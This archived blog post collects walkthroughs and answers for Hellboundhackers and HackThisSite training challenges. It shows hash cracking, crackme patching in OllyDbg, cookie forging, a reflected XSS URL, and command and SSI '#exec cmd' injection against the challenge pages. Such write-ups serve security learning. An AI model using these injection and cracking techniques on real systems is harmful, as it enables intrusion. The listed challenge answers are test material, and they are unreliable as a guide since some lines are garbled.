archirve from guru.net.vn
Hellboundhackers other challenges
(Tác giả:Phạm Đức Hải) lv4:
view source –> form submited : http_docs/mail.html
view-source:http://www.hellboundhackers.org/challenges/real4/http_docs/mail.html
<form name=”theForm” action=”../main/mail.php” METHOD=”POST”>
<input type=”hidden” name=”required” value=”‘recipient,credit”>
http://www.hellboundhackers.org/challenges/real4/main/
login page :
http://www.hellboundhackers.org/challenges/real4/main/Tlogin/index.php
lv10:
Description: Crack this hash: hbh:spnlhmTpnxYQ.
D:\kikicoco\Hacks\Tools\dicts\john>john -w
:\kikicoco\Hacks\Tools\dicts\Wordlis
t.txt hbh.txt
Loaded 1 password hash (Traditional DES [24/32 4K])
website (hbh)
guesses: 1 time: 0:00:00:19 100% c/s: 166690 trying: website – wechsler
real 14:
Aldarhawks Flog
1. Donload Flog
2. Install
3. Check out directory
http://www.hellboundhackers.org/challenges/real14/data/users.0.dat
username Administrator
password d6a6bc0db10694a2d90e3a69648f3a03
rank 1
name Aldar Hawk
email ddowling2690@aol.com
url http://myamazing-anti-hbh-flog/flog/
administrator.write.posts.markup markdown_smartypants
administrator.write.posts.allowcomments 1
administrator.write.pages.markup markdown_smartypants
Using cain to crack
Password :hacker
hellboundhackers Realistic Missions 1,2
(Tác giả:Phạm Đức Hải) lv1:
johndoe/password
http://www.hellboundhackers.org/challenges/real1/images/administrator.txt
administrator
password = password:60c033095644bd16
status:administrator
AuthID: 4601420
JohnDoe
password = password:5d2e19393cc5ef67
Network analysis
sessionid: 4601597
–> Using Js Inject
javascript:document.cookie=”AuthID=4601420″;–>Refesh–>ok
lv 2:
using scan tools (self coding)
http://www.hellboundhackers.org/challenges/real2/backups/backup_2004-09-04_1900.sql
Backups For HellBound | |
————————
|
HellBound Backup File |
========================================== |
‘HellBound_Users’ |
admin: ‘9acb44549b41563697bb490144ec6258′ |
========================================== |
End Of Backup File |
———————— |
No More Backups | |
——————————————————–
9acb44549b41563697bb490144ec6258 –> MD5 hash
using Cain and Abel
Plaintext of 9acb44549b41563697bb490144ec6258 is status
Attack stopped!
1 of 1 hashes cracked
All hellboundhackers Application Missions
(Tác giả:Phạm Đức Hải) Application :
app1:
OllyDbg
0012F3E8 00403F22 RETURN to app1.00403F22 from MSVBVM60.__vbaStrCmp
0012F3EC 0040380C UNICODE “g7*2+’&1,3″
0012F3F0 0015578C UNICODE “1234567″
–>g7*2+’&1,3 –>frozenIce
app2 : ASCDEMO
pass word is suffix
app3:
Replace : ihavnolife –>icrackedit
PASS : 88PARROT24
app4:OllyDbg
0012F3E8 0040BCE2 RETURN to password.0040BCE2 from MSVBVM60.__vbaStrCmp
0012F3EC 00407514 UNICODE “livebox”
0012F3F0 001556BC UNICODE “1234567″
livebox –> Atmosphere
app5:OllyDbg
004020FB . BA A01C4000 MOV EDX,app5.00401CA0 ; UNICODE “ASDTY-”
00402135 . BA B41C4000 MOV EDX,app5.00401CB4 ; UNICODE “XYXEW-”
0040213F . BA C81C4000 MOV EDX,app5.00401CC8 ; UNICODE “NUPCY”
XVI32:
Replace : XXXXX-XXXXX-XXXXX
ASDTY-XYXEW-NUPCY
google : Visual Basic ampersand
Replace button label :Enter –>E&ter
Alt+t — >1013283
app6:
0012F96C 0040AA23 RETURN to app6.0040AA23 from MSVBVM60.__vbaStrCmp
0012F970 00409354 UNICODE “bah”
0012F974 00155E34 UNICODE “1234567″
bah –>regedit32
app7:
0012F418 00408787 RETURN to app7.00408787 from MSVBVM60.__vbaStrCmp
0012F41C 004034D0 UNICODE “jonn4y”
0012F420 0015B9FC UNICODE “12345″
–> user : jonn4y
C2 : Search for text:
0040877C . 68 D0344000 PUSH app7.004034D0 ; UNICODE “jonn4y”
004087EC . 68 E4344000 PUSH app7.004034E4 ; UNICODE “vb6″
00408A6A . 68 54364000 PUSH app7.00403654 ; UNICODE “Password: screwdriver”
app8:
Replace time : 1000 to 9999
Replace Enter to E&ter
OllyDbg :
0012FB24 001557D4 UNICODE “19gas482″
Replace:
Password
19gas482
change : Box –> 00 00 00 (in HEX)
–> pass : 1337Crack8055
app9:
input : test/123456
00401306 |. BF 16314000 MOV EDI,crackme1.00403116 ; ASCII “F71B995B”
00401306 |. BF 16314000 MOV EDI,crackme1.00403116 ; ASCII “FD7CE950″
–> pass : Alias
app10:
00401475 |. BE 7E304000 MOV ESI,crackme2.0040307E ; ASCII “6032F9CE9BA8D6E1″
Input : 123456
00401155 |. BF 4A314000 MOV EDI,crackme2.0040314A ; ASCII “2265A988CBEABA98″
==> 123456 <-> 2265A988CBEABA98
6032F9CE9BA8D6E1 –> pass encoded
Set break point :
00401475 |. BE 7E304000 MOV ESI,crackme2.0040307E ; ASCII “6032F9CE9BA8D6E1″
–> F7
00401484 |. F3:A6 REPE CMPS BYTE PTR ES:[EDI],BYTE PTR DS:>
ECX=00000010 (decimal 16.)
DS:[ESI]=[0040307E]=36 (‘6′)
ES:[EDI]=[0040314A]=32 (‘2′)
——–
6032F9CE9BA8D6E1
60 :
32 :
F9 : c
CE :
9B : e
9B :
A8 :
D6 :
E1 :
abcdefgh
0040147A |. BF 4A314000 MOV EDI,crackme2.0040314A ; ASCII “7235F9D89BBADDF0″
ijklmnop
0040147A |. BF 4A314000 MOV EDI,crackme2.0040314A ; ASCII “7A3DF1D093B2D5E8″
qrstxyzw
0040147A |. BF 4A314000 MOV EDI,crackme2.0040314A ; ASCII “6225E9C886A5C0EF”
app11:
PEiD.exe –> check
–> C# code
Reflector.exe
–> decode
text29 ”To Dead To Hide” string
text27 ”Strong Witted” string
Pass : Strong Witted
hellboundhackers basic web challenges 17,18,19
(Tác giả:Phạm Đức Hải) lv17:
basic17.class
http://hellboundhackers.org/challenges/basic17/basic17.class
// Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov Date: 3/13/2007 2:25:00 PM
// Home Page : http://members.fortunecity.com/neshkov/dj.html – Check often for new version!
// Decompiler options: packimports(3)
// Source File Name: basic17.java
import java.applet.Applet;
import java.applet.AppletContext;
import java.awt.Color;
import java.awt.TextField;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.net.MalformedURLException;
import java.net.URL;
public class basic17 extends Applet
implements ActionListener
{
public void init()
{
setBackground(Color.WHITE);
}
public basic17()
{
file4 = “baysick-seventeen.complete.php?pass=”;
inputLine = new TextField(15);
file2 = “test”;
add(inputLine);
inputLine.addActionListener(this);
file2 = “challenges”;
}
public void actionPerformed(ActionEvent actionevent)
{
String s = inputLine.getText();
if(s.equals(“ifYOU’REhereYOU’REelite”))
{
URL url = null;
String s1 = “http://www.hellboundhackers.org/“;
String s2 = “basic17″;
try
{
url = new URL(getDocumentBase(), s1 + “/” + file2 + “/” + s2 + “/” + file4 + new String(“elite”));
}
catch(MalformedURLException malformedurlexception) { }
getAppletContext().showDocument
(url);
} else
{
inputLine.setText(“not yet”);
}
}
String file4;
TextField inputLine;
String file2;
}
–> Pass:ifYOU’REhereYOU’REelite
Lv18:
lv19:
View header:
Encryption: ROT-47
Password: #@Ecfu@C%96(:?P
http://just-stuart.com/cgi-bin/ur13?proc
Pass:Rot47ForTheWin!
hackthissite : basic mission solution
(Tác giả:Phạm Đức Hải) By meomeo079
lv1 : 896450d8
lv2 : no pass
lv3 : http://www.hackthissite.org/missions/basic/4/password.php
b23c8d4d
lv 4 : 51f1b074
save file and change :
<form action=”http://www.hackthissite.org/missions/basic/4/level4.php” method=”post”>
<input name=”to” value=”loveha@gmail.com” type=”hidden”><input value=”Send password to Sam” type=”submit”></form></center><br><br><center><b>password:</b><br>
lv 5 : javascript:void(document.forms[1].to.value=”loveha@gmail.com”);
javascript:alert(document.forms[1].to.value);
ca87405d
lv6 :
a- >z :
abcdefghi……….
acegikmoqsuwy{}ƒ…‡‰‹’
1234567890—>
13579;=?A9
23456789
2468:<>@
(i+0)(i+1)(i+2)
pass: e-0 1-1 h-2 8-3 8-4 f-5 i-6 :-7 == e0f54ac3
lv 7 :
2004;ls
k1kh31b1n55h.php
index.php
level7.php
cal.pl
http://www.hackthissite.org/missions/basic/7/k1kh31b1n55h.php
f6d1916d
Lv8 :
/var/www/hackthissite.org/html/missions/basic/8/
Sam’s young daughter Stephanie used SSI
More infor about SSI : http://httpd.apache.org/docs/1.3/howto/ssi.html
–> type in the text box :
<!–#exec cmd=”ls” –>
<!–#exec cmd=”ls /missions/basic/8/” –>
Hi, tshngmww.shtml hipykpqu.shtml ztxdhjxn.shtml avpfeoie.shtml
fviqpmaw.shtml kqbybdzc.shtml dzrnmzgx.shtml npcsygfl.shtml
whqxxojt.shtml ylomcmvu.shtml uhdppswp.shtml gzntiicx.shtml
dzwbqiuu.shtml qvzuieng.shtml smcerykh.shtml qjhnmhmq.shtml znodwztr.shtml!
Your name contains 254 characters.
–> No no no
<!–#exec cmd=”ls ..” –>
–>wow –>
http://www.hackthissite.org/missions/basic/8/au12ha39vc.php
Pass : 47f1a145
All hellboundhackers JavaScript challenges solution
(Tác giả:Phạm Đức Hải) All hellboundhackers JavaScript challenges solution
lv1:
<!–
function pasuser(form) {
if (form.id.value==”partyhard2″) {
if (form.pass.value==”lifeisshort1″) {
location=”index.php?user=partyhard2&pass=lifeissho
rt1″
}
else {
alert(“Invalid Password”)
}
}
else {
alert(“Invalid UserID”)
}
}
//–>
lv2:
http://www.hellboundhackers.org/challenges/js/js2/level2script.js
<!–
var password, i;
password=prompt(“Please enter password!”,”");
if (password==”level2done”) {
location=”huh.php”
i=4;
}
else {
alert(“Wrong password, you’ll go back to the index”)
location=”index.php”
}
//–>
lv3:
<script>
var U7=window,W8=document;
var a1=”%3Cscript%20language%3D%22JavaScript1.1%22%3E%0D%0A%3C%21–%0D%0Afunction%20right%28e%29%20%7B%0D%0A%20%20if%20%28navigator.appName%20%3D%3D%20%27Netscape%27%20%26%26%20%28e.which%20%3D%3D%203%20%7C%7C%20e.which%20%3D%3D%202%29%29%0D%0A%20%20%20%20return%20false%3B%0D%0A%20%20else%20if%20%28navigator.appName%20%3D%3D%20%27Microsoft%20Internet%20Explorer%27%20%26%26%20%28event.button%20%3D%3D%202%20%7C%7C%20event.button%20%3D%3D%203%29%29%20%7B%0D%0A%20%20%20%20alert%28%22Rigth-mouse%20click%20isn%27t%20allowed%21%22%29%3B%0D%0A%20%20%20%20return%20false%3B%0D%0A%20%20%7D%0D%0A%20%20return%20true%3B%0D%0A%7D%0D%0Adocument.onmousedown%3Dright%3B%0D%0Aif%20%28document.layers%29%20window.captureEvents%28Event.MOUSEDOWN%29%3B%0D%0Awindow.onmousedown%3Dright%3B%0D%0A//–%3E%0D%0A%3C/script%3E%0D%0A%0D%0A%3Cscript%20language%3D%22javascript%22%3E%0D%0A%3C%21–%0D%0Afunction%20pasuser%28form%29%20%7B%0D%0Avar%20text2%3D%27lolage%27%0D%0Avar%20text4%3D%27hahaomgz%27%0D%0A%20%20if%20%28form.text1.value%3D%3Dtext2%29%20%7B%20%0D%0A%20%20%20%20if%20%28form.text3.value%3D%3Dtext4%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0D%0A%20%20%20%20%20%20location%3D%22index.php%3Ftext1%3Dlol%26text3%3Dhaha%22%20%0D%0A%20%20%20%20%7D%0D%0A%20%20%20%20else%20%7B%0D%0A%20%20%20%20%20%20alert%28%22Invalid%20Password%22%29%0D%0A%20%20%20%20%7D%0D%0A%20%20%7D%0D%0A%20%20else%20%7B%0D%0A%20%20%20%20alert%28%22Invalid%20UserID%22%29%0D%0A%20%20%7D%0D%0A%7D%0D%0A//–%3E%0D%0A%3C/script%3E%0D%0A%3Ccenter%3E%0D%0A%20%20%3Ctable%20cellpadding%3D%224%22%20border%3D%220%22%3E%0D%0A%20%20%20%20%3Ctr%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%2224%22%20width%3D%2284%22%3EUser%20ID%3A%3C/td%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%2224%22%20width%3D%22170%22%3E%3Cform%20name%3D%22login%22%3E%3Cinput%20name%3D%22text1%22%20type%3D%22text%22%3E%3C/td%3E%0D%0A%20%20%20%20%3C/tr%3E%0D%0A%20%20%20%20%3Ctr%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%2224%22%20width%3D%2284%22%3EPassword%3A%3C/td%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%2224%22%20width%3D%22170%22%3E%3Cinput%20name%3D%22text3%22%20type%3D%22password%22%3E%3C/td%3E%0D%0A%20%20%20%20%3C/tr%3E%0D%0A%20%20%20%20%3Ctr%3E%0D%0A%20%20%20%20%20%20%3Ctd%20align%3D%22center%22%20height%3D%221%22%20width%3D%2284%22%3E%3Cinput%20type%3D%22button%22%20value%3D%22Login%22%20onClick%3D%22pasuser%28this.form%29%22%3E%3C/td%3E%0D%0A%20%20%20%20%20%20%3Ctd%3E%3C/td%3E%0D%0A%20%20%20%20%3C/tr%3E%0D%0A%20%20%3C/table%3E%0D%0A%3C/center%3E”;
function V0(){var V0;V0=unescape(a1);W8.write(V0);}V0();
</script>
Using html decode : http://scriptasylum.com/tutorials/encdec/encode-decode.html
<script>
var U7=window,W8=document;
var a1=”<script language=”JavaScript1.1″>
<!–
function right(e) {
if (navigator.appName == ‘Netscape’ && (e.which == 3 || e.which == 2))
return false;
else if (navigator.appName == ‘Microsoft Internet Explorer’ && (event.button == 2 || event.button == 3)) {
alert(“Rigth-mouse click isn’t allowed!”);
return false;
}
return true;
}
document.onmousedown=right;
if (document.layers) window.captureEvents(Event.MOUSEDOWN);
window.onmousedown=right;
//–>
</script>
<script language=”javascript”>
<!–
function pasuser(form) {
var text2=’lolage’
var text4=’hahaomgz’
if (form.text1.value==text2) {
if (form.text3.value==text4) {
location=”index.php?text1=lol&text3=haha”
}
else {
alert(“Invalid Password”)
}
}
else {
alert(“Invalid UserID”)
}
}
//–>
</script>
<center>
<table cellpadding=”4″ border=”0″>
<tr>
<td align=”center” height=”24″ width=”84″>User ID:</td>
<td align=”center” height=”24″ width=”170″><form name=”login”><input name=”text1″ type=”text”></td>
</tr>
<tr>
<td align=”center” height=”24″ width=”84″>Password:</td>
<td align=”center” height=”24″ width=”170″><input name=”text3″ type=”password”></td>
</tr>
<tr>
<td align=”center” height=”1″ width=”84″><input type=”button” value=”Login” onClick=”pasuser(this.form)”></td>
<td></td>
</tr>
</table>
</center>”;
function V0(){var V0;V0=unescape(a1);W8.write(V0);}V0();
</script>
—>
var text2=’lolage’
var text4=’hahaomgz’
—>http://www.hellboundhackers.org/challenges/js/js3/index.php?text1=lol&text3=haha
Change to : http://www.hellboundhackers.org/challenges/js/js3/index.php?text1=lolage&text3=hahaomgz –>ok
lv4:
javascript:alert(document.cookie);document.write (document.cookie);
Using XSS:
http://www.hellboundhackers.org/challenges/js/js4/index.php?submit=%3Cscript%3Ealert(document.cookie)%3C/script%3E
lv 5:
<script language=”JavaScript” src=”level5.js”></script>
http://www.hellboundhackers.org/challenges/js/js5/level5.js
a = prompt(“Please enter password!”,”");
date = new Date();
year = date.getYear();
b = year+12;
if(a == b){
alert(“Good job! You got it!”);
window.location.href=year+”.php”;
}
else
{
alert(“Try it again!”);
}
—->Create a html file :
<html>
<head>
<title>Owned</title>
</head>
<script language=”javascript”>
a = prompt(“Please enter password!”,”");
date = new Date();
year = date.getYear();
b = year+12;
alert(b);
if(a == b){
alert(“Good job! You got it!”);
window.location.href=year+”.php”;
}
else
{
alert(“Try it again!”);
}
</script>
</html>
———> alert(b); 118
lv6:
<script language=”Javascript”>
function checkPass(){
Location = document.form.password.value
Location = “js6-” + “window.open” + “.php”
document.write(“Pass= ” + Location);
if (document.form.password.value == Location ) {
alert(“Good Job!”)
window.open(Location)
}
else{
alert(“Try Again!”)
}
}
</script>
—>pass: js6-window.open.php
lv7 :
Using Flashget download file :
http://www.hellboundhackers.org/challenges/js/js7/index.php
<script language=”JavaScript”>
function password () {
var s1, a2, v3, e4, input;
s1=window.document.bgColor;
a2=window.document.linkColor;
v3=s1.substring (6,9)+a2.substring (2,8);
e4=v3.toUpperCase ();
input=prompt(“Password:”,”");
if (input!=v3 && input!=e4) {
alert(“Wrong!”);
window.location.href=”../index.php”;
}
else {
window.location.href=v3+”.php”;
}
}
</script>
</head>
<body bgcolor=”#D0D0D0″ text=”#FF9900″ onLoad=”password()” link=”#FF9900″>
—>pass :0f9900
lv8:
<script>document.cookie=”secret=90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe”</script>
Solve : hex->decial->ACSII
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe144 221 59 33 95 35 154 99 63 166 174 60 49 100 63 96 46 234 63 114 81 207 253 240 254
144 221 59 33 95 35 154 99 63 166 174 60 49 100 63 96 46 234 63 114 81 207 253 240 254
A-AZ: 65-90
a-Z : 97-122
max : 254-122 = 132
—> 63 : a,e,i,o,u
63 : a,–> d=97-63=36 : ª
63 : e –> d=101-63 = 38 : ¶
63 : i –> d=105-63 = 42 : º
63 : o –> d=111-63 = 48 : À
63 : u
lv9:
<script>
var c = 34200;
var p = “%68%6F%77%73%6C%69%66%65%3F%65%61%73%79%2E%00″;
var a;
fc();
function fc()
{
if(c>0)
{
document.getElementById(“say”).innerHTML = “<b><big>Please wait ” + c + ‘ seconds.</big></b>’;
c = c – 1;
setTimeout(“fc()”, 1000)
} else {
a = unescape(“%33″);
document.getElementById(“say”).innerHTML = “Your password is: ” + unescape(p-a) + unescape(“%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%27%69%6E%64%65%78%2E%70%68%70%27%20%6D%65%74%68%6F%64%3D%27%50%4F%53%54%27%3E%0D%0A%45%6E%74%65%72%20%50%61%73%73%77%6F%72%64%3A%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%27%74%65%78%74%27%20%6E%61%6D%65%3D%27%70%61%73%73%27%20%73%74%79%6C%65%3D%27%74%65%78%74%62%6F%78%27%3E%3C%62%72%3E%0D%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%27%73%75%62%6D%69%74%27%20%6E%61%6D%65%3D%27%73%75%62%6D%69%74%27%20%76%61%6C%75%65%3D%27%43%68%65%63%6B%20%79%6F%75%20%61%6E%73%77%65%72%27%20%73%74%79%6C%65%3D%27%62%75%74%74%6F%6E%27%3E%0D%0A%3C%2F%66%6F%72%6D%3E%00″);
}
}
</script>
decode :
<script>
var c = 34200;
var p = “howslife?easy.”;
var a;
fc();
function fc()
{
if(c>0)
{
document.getElementById(“say”).innerHTML = “<b><big>Please wait ” + c + ‘ seconds.</big></b>’;
c = c – 1;
setTimeout(“fc()”, 1000)
} else {
a = unescape(“3″);
document.getElementById(“say”).innerHTML = “Your password is: ” + unescape(p-a) + unescape(“<form action=’index.php’ method=’POST’>
Enter Password: <input type=’text’ name=’pass’ style=’textbox’><br>
<input type=’submit’ name=’submit’ value=’Check you answer’ style=’button’>
</form>;
}
}
</script>
—-: javascript:c=1;Back–>ok
lv10:
<script>
//By system_meltdown
function checkpass()
{
pass=document.password.pass.value;
rawr=unescape(‘%61%68%6f%79′);
string=”llama llama duck!”;
a=string.charCodeAt(1);
b=string.charCodeAt(7);
c=string.charCodeAt(4);
schloob
60*50/3*a)-(b*c))/2/5+b;
asdf=rawr+”_”+schloob;
if(pass==asdf)
{
alert(‘Wahoo you got it!’);
}
else
{
alert(‘Awww shame!’);
}
}
</script>
rawr=unescape(‘%61%68%6f%79′);decode : rawr=unescape(‘ahoy’);
schloob=9860.4
asdf=ahoy_9860.4
lv11:
<script>
//By system_meltdown
var s = “Llama llama chicken duck, schloob mcfroob, moo asdf qwerty zxcv. Rawr llama kinasd, [insert random crap here]It’s hammer on the keyboard time: sfsdfoashdfy78sdfysdfs67dftsdf 6tsdf76as tfa. Well I’m bored, so if you’re still reading this I advise you to stop because you are wasting your time….dumbarse 
“;
var asd = s.charCodeAt(14);
var fdsa = s.charCodeAt(42);
var sadfasf = s.charCodeAt(4);
var moo = s.charCodeAt(43);
var teeep = s.charCodeAt(32);
var asdf = asd+fdsa+sadfasf+moo+teeep;
function checkpass()
{
pass=document.password.pass.value;
if(pass==asdf)
{
alert(‘Well done dude!’);
}
else
{
alert(‘You suck!’);
}
}
</script>
—>javascript:alert(asdf); –>pass : 441
lv12:
<script>
function checkpass()
{
pass=document.password.pass.value;
z=2;
x=z*1.5;
v=z*2;
w=v*1.75;
y=v*1.25;
abc(y*v*y*x+z)*x+w)*z+y)*v+w;
if(pass==abc)
{
alert(‘Congratz! You are good at Math’);
}
else
{
alert(‘Sorry, try again when you learn more Math!’);
}
}
</script>
—> pass: 7331
lv13:
<script>document.cookie=’authorized=false’</script>
–>
http://www.hellboundhackers.org/challenges/js/js13/index.php?javascript:document.cookie=’authorized=true‘
lv14:
script>
a = screen.width;
if(a != 800)
{
alert(‘Sorry you do not have the right parameters!’);
}else{
window.location=’/challenges/js/js14/index.php?ans=0e110c5fbf226dffd25740ae56d4edb1′
}
http://www.hellboundhackers.org/challenges/js/js14/index.php?ans=0e110c5fbf226dffd25740ae56d4edb1
lv15:
var a = password.charAt(9)=q
var b = password.charAt(10)=u
var c = password.charAt(4)=e
var d = password.charAt(7)=r
var e = password.charAt(1)=y
var f = password.charAt(6)=”"
var g = password.charAt(3)=t
var h = password.charAt(8)=e
var i = password.charAt(0)=s
var j = password.charAt(13)=t
var k = password.charAt(6)=”"
var l = password.charAt(5)=m
var m = password.charAt(11)=e
var n = password.charAt(2)=s
var o = password.charAt(12)=s
var riddle = “query test mess”;
–>pass : system request
Bình luận mới